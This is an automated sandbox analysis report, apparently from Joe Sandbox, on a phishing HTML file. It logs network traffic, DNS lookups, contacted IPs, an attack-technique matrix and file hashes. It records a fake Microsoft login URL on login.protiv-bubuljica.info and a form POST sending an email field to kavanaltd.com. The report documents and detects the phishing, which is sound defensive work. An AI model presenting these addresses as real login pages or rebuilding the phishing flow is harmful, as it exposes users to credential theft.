              Source: https://login.protiv-bubuljica.info/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638688620041959305.NTkyNTkwMWItZDQ4MS00YTJmLWJmMmYtODQwYWVmYjcxZmViOTAxNWU1MDctYTk0Zi00NjY5LTliZWItZjYwOTk4YmU1MWM4&ui_locales=en-US&mkt=en-US&client-request-id=6bc6e396-34b0-458c-919d-387a574de718&state=beuNdK9GVDhEksd4qZ-fWCUP4W7jlNDN39V2Tp_tAoX9eZD_0065aORRKkuShaU6S_B_MUsIQ2h1wVyAU-eUd6OzcGbsEScg-9B309BLaHHYXOkAsGz4hy3kgORaImRtPdH8D6RxfaHoOXT1XhFWUXpbteCIey5C9kjtzfsgNGQLuwgGbrSFX3jcr4U1UK9fHosgTSNthfg4_CjbqPHPDAhzUC-zpoZvNb0jnTpsi2Aw_vVyqnzTyzfTe619CHI_7tUVQ6usu0ifPl_84qqQOw&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
              Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49721 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49722 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49723 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49766 version: TLS 1.2
              Source: chrome.exeMemory has grown: Private usage: 1MB later: 27MB
              Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.4
              Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.4
              Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.4
              Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.4
              Source: unknownTCP traffic detected without corresponding DNS query: 20.190.147.4
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
              Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
              Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
              Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
              Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
              Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
              Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
              Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
              Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
              Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
              Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
              Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
              Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
              Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
              Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
              Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
              Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
              Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
              Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
              Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
              Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
              Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
              Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
              Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
              Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
              Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
              Source: unknownTCP traffic detected without corresponding DNS query: 4.245.163.56
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: kavanaltd.com
              Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: login.protiv-bubuljica.info
              Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: js.hcaptcha.com
              Source: global trafficDNS traffic detected: DNS query: newassets.hcaptcha.com
              Source: global trafficDNS traffic detected: DNS query: api2.hcaptcha.com
              Source: global trafficDNS traffic detected: DNS query: identity.nel.measure.office.net
              Source: global trafficDNS traffic detected: DNS query: www.protiv-bubuljica.info
              Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
              Source: unknownHTTP traffic detected: POST /news/index.php HTTP/1.1Host: kavanaltd.comConnection: keep-aliveContent-Length: 13Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: nullContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Data Raw: 6d 3d 25 32 35 45 4d 41 49 4c 25 32 35 Data Ascii: m=%25EMAIL%25
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
              Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
              Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
              Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
              Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
              Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49721 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49722 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49723 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49766 version: TLS 1.2
              Source: classification engineClassification label: mal92.phis.evad.winHTML@20/33@40/211
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\MGj3hwACvs.html
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2000 --field-trial-handle=1872,i,3234027420598374308,6823591640521138259,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2000 --field-trial-handle=1872,i,3234027420598374308,6823591640521138259,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: Window RecorderWindow detected: More than 3 window changes detected

              Data Obfuscation

              barindex
              Source: https://login.protiv-bubuljica.info/HaNkgGIY#HTTP Parser: https://login.protiv-bubuljica.info/HaNkgGIY#
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting
              1
              Drive-by Compromise
              Windows Management Instrumentation1
              Browser Extensions
              1
              Process Injection
              1
              Masquerading
              OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              Scripting
              1
              Registry Run Keys / Startup Folder
              1
              Process Injection
              LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAt1
              Registry Run Keys / Startup Folder
              1
              Extra Window Memory Injection
              1
              Deobfuscate/Decode Files or Information
              Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Extra Window Memory Injection
              NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://kavanaltd.com/news/index.php0%Avira URL Cloudsafe
              file:///C:/Users/user/Desktop/MGj3hwACvs.html0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              www.protiv-bubuljica.info
              104.194.152.148
              truefalse
                unknown
                login.protiv-bubuljica.info
                104.194.152.148
                truetrue
                  unknown
                  js.hcaptcha.com
                  104.19.229.21
                  truefalse
                    high
                    cdnjs.cloudflare.com
                    104.17.24.14
                    truefalse
                      high
                      challenges.cloudflare.com
                      104.18.94.41
                      truefalse
                        high
                        sni1gl.wpc.omegacdn.net
                        152.199.21.175
                        truefalse
                          high
                          www.google.com
                          172.217.21.36
                          truefalse
                            high
                            s-part-0035.t-0009.t-msedge.net
                            13.107.246.63
                            truefalse
                              high
                              api2.hcaptcha.com
                              104.19.229.21
                              truefalse
                                high
                                newassets.hcaptcha.com
                                104.19.229.21
                                truefalse
                                  high
                                  kavanaltd.com
                                  192.185.77.66
                                  truetrue
                                    unknown
                                    identity.nel.measure.office.net
                                    unknown
                                    unknownfalse
                                      high
                                      aadcdn.msftauth.net
                                      unknown
                                      unknownfalse
                                        high
                                        NameMaliciousAntivirus DetectionReputation
                                        https://login.protiv-bubuljica.info/HaNkgGIY#true
                                          unknown
                                          http://kavanaltd.com/news/index.phpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          file:///C:/Users/user/Desktop/MGj3hwACvs.htmltrue
                                          • Avira URL Cloud: safe
                                          unknown
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
                                          IPDomainCountryFlagASNASN NameMalicious
                                          104.17.24.14
                                          cdnjs.cloudflare.comUnited States
                                          13335CLOUDFLARENETUSfalse
                                          172.217.19.238
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          13.107.246.63
                                          s-part-0035.t-0009.t-msedge.netUnited States
                                          8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                          1.1.1.1
                                          unknownAustralia
                                          13335CLOUDFLARENETUSfalse
                                          172.217.17.78
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          172.217.17.35
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          104.18.94.41
                                          challenges.cloudflare.comUnited States
                                          13335CLOUDFLARENETUSfalse
                                          104.194.152.148
                                          www.protiv-bubuljica.infoUnited States
                                          53667PONYNETUStrue
                                          40.126.53.9
                                          unknownUnited States
                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                          216.58.208.227
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          104.18.95.41
                                          unknownUnited States
                                          13335CLOUDFLARENETUSfalse
                                          192.185.77.66
                                          kavanaltd.comUnited States
                                          46606UNIFIEDLAYER-AS-1UStrue
                                          172.217.19.234
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          2.16.149.34
                                          unknownEuropean Union
                                          1273CWVodafoneGroupPLCEUfalse
                                          104.19.229.21
                                          js.hcaptcha.comUnited States
                                          13335CLOUDFLARENETUSfalse
                                          64.233.165.84
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          20.190.147.4
                                          unknownUnited States
                                          8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                          239.255.255.250
                                          unknownReserved
                                          unknownunknownfalse
                                          152.199.21.175
                                          sni1gl.wpc.omegacdn.netUnited States
                                          15133EDGECASTUSfalse
                                          172.217.21.36
                                          www.google.comUnited States
                                          15169GOOGLEUSfalse
                                          IP
                                          192.168.2.16
                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1567867
                                          Start date and time:2024-12-03 23:32:13 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:13
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • EGA enabled
                                          Analysis Mode:stream
                                          Analysis stop reason:Timeout
                                          Sample name:MGj3hwACvs.html
                                          Detection:MAL
                                          Classification:mal92.phis.evad.winHTML@20/33@40/211
                                          Cookbook Comments:
                                          • Found application associated with file extension: .html
                                          • Exclude process from analysis (whitelisted): dllhost.exe
                                          • Excluded IPs from analysis (whitelisted): 216.58.208.227, 64.233.165.84, 172.217.19.238, 34.104.35.123
                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, slscr.update.microsoft.com, clientservices.googleapis.com, clients.l.google.com
                                          • Not all processes where analyzed, report is missing behavior information
                                          • VT rate limit hit for: MGj3hwACvs.html
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 3 21:32:48 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                          Category:dropped
                                          Size (bytes):2673
                                          Entropy (8bit):3.990583372487829
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:0301B1CE238DF7296A3D39BEDABC7AFC
                                          SHA1:E77FBE334A298711B46D0454C5E9F16988234BE5
                                          SHA-256:AC0ED1E1E85517714C2D130F927B861CAD9B583B2A2165A84AA4C16379432DE6
                                          SHA-512:D60A8A46061E669840CB4EE11DF1AFF5B940DC95F5843029BA57174C5B88329407075F85F9ED6D6B64905759BA5492E76E625F28D3FCDA975476338F7EA234CA
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:L..................F.@.. ...$+.,....E,&H.E..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Y......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............N.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
